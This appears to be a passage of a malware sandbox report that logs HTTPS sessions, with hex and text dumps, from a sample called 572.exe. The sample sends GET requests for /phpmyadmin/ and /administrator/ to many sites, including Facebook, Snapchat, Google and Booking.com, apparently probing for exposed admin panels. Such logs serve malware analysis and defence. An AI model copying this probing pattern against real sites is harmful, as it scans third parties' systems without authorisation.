                                                                                                                                                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC2156INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 2a 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 20 2a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' blob:
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC812INData Raw: 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 65 6d 62 65 64 64 65 72 2d 70 6f 6c 69 63 79 2d 72 65 70 6f 72 74 2d 6f 6e 6c 79 3a 20 72 65 71 75 69 72 65 2d 63 6f 72 70 3b 72 65 70 6f 72 74 2d 74 6f 3d 22 63 6f 65 70 5f 72 65 70 6f 72 74 22 0d 0a 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 6f 70 65 6e 65 72 2d 70 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 2d 61 6c 6c 6f 77 2d 70 6f 70 75 70 73 3b 72 65 70 6f 72 74 2d 74 6f 3d 22 63 6f 6f 70 5f 72 65 70 6f 72 74 22 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 30 31 20 4a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"Pragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 J


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                108192.168.2.65653231.13.65.7443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: lookaside.fbsbx.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC958INHTTP/1.1 400 Bad Path
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Proxy-Status: proxy_internal_response; e_isproxyerr="AcJj-NzuLH1VNBU5OSS87I6cfWQPanMfX2PQASUSiP9X7KgCzDDUUB7j2GeZEA"; e_clientaddr="AcKFwaBTxTas6SOQypQ6BiCJTQsjSOQG0XMjTyJzM3nscnHblFnj-pDsk47bx5I7o7jW3Z0_Xo_G83gS"; e_fb_vipport="AcIXAoFGQsW7DcdNc4jXId5RjlMc0vX3GaBbzymIVBHk3v_wpiZy_qr6rjax"; e_fb_vipaddr="AcKKrEpJP61xTbsX8u8NK6tOa1HQ5FJ_UxnDuSweJGBVXFf9aml35iTc5CBYSO_sUagmHw"; e_fb_requesthandler="AcJOE6Ltu3cMIqtbcvfrnKNa7O-MwEoci8dS71L7BeZ1VkyYps4tju4IHjrGvTjwEKtdbZTw-TORUYDx"; e_fb_builduser="AcK305DlXuYxd5Su1pXBRwWAN9_y_7vRailQxiroRp_JWHlzVWq6obrK6pO7cGBmggk"; e_fb_binaryversion="AcK7xQf5w_8IG43oQHRRfXWmMKkcyKq3uTUYsh5SqPKHhtfmh7wm0RsaLIubnvrXaeduhH6kAQcvUL32rcFr_zM-r6K-2YilXUA"; e_proxy="AcI4KaRtN3wusLrfZDSrUhbKI35af5bcdpFyd4mXDi3tWym3i3ErHuFxinZJQNDlSDtoHboHeiMqvfOZ"
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2959
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1INData Raw: 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC2958INData Raw: 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 61 63 65 62 6f 6f 6b 20 7c 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: !DOCTYPE html><html lang="en" id="facebook"> <head> <title>Facebook | Error</title> <meta charset="utf-8"> <meta http-equiv="cache-control" content="no-cache"> <meta http-equiv="cache-control" content="no-store"> <meta http-equiv="c


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                109192.168.2.65688634.149.46.130443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC182OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5706INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=22d74ccb-015c-4e3d-b87e-d8ca27d63248; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:14:53 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-cloud-trace-context: 6210582160b6e8ef09a6c15032b6adc9
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                server: API Gateway
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                via: 1.1 google, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                alt-svc: clear
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC664INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 34 34 37 31 38 38 33 37 30 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 26 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                110192.168.2.656612172.66.41.20443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC177OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: yellosa.co.za
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC609INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                location: http://www.yellosa.co.za/administrator/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=trfPGYEvF30TR8CHJybJ7A89e580%2Fy95MFJHjZOt2oW0xzas0wnKzJ95c7nZeklGN2764taL8rgq7znt6yRPW%2FwgXgqb14mdudwGEFeniJfV3BF%2Ftw%2FrD5v4jjcLgvyK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7e995f4589-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                111192.168.2.655257185.120.71.24443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: analvids.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC199INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.analvids.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC178INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                112192.168.2.656099177.74.1.157443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:15:04 UTC102INData Raw: 48 54 54 50 2f 31 2e 30 20 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.0 408 Request Time-outCache-Control: no-cacheConnection: closeContent-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:15:04 UTC110INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                113192.168.2.657548142.250.105.84443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:06 UTC245OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://accounts.google.com/administrator/


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                114192.168.2.6628043.161.150.69443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:07 UTC192OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC2050INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=7ca24f3b5c0f003b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilMYde8P2VbypUEfLchvSEFGAJezDrMX5xOf59abzqp9DKM_9-kmek_KA
                                                                                                                                                                                                                                                                                                                                                                content-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=7ca24f3b5c0f003b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilMYde8P2VbypUEfLchvSEFGAJezDrMX5xOf59abzqp9DKM_9-kmek_KA; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-qg33KKQUzYnzfDG' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=86400; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 57674a900f587a3a1f1571205e001c6c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: UJ-tXhDVustfeRTAoDJdwDRthW-1YUhMwnI7BBaVXt6BJ-zAFdwIOA==
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC16384INData Raw: 35 35 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 55b8<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0
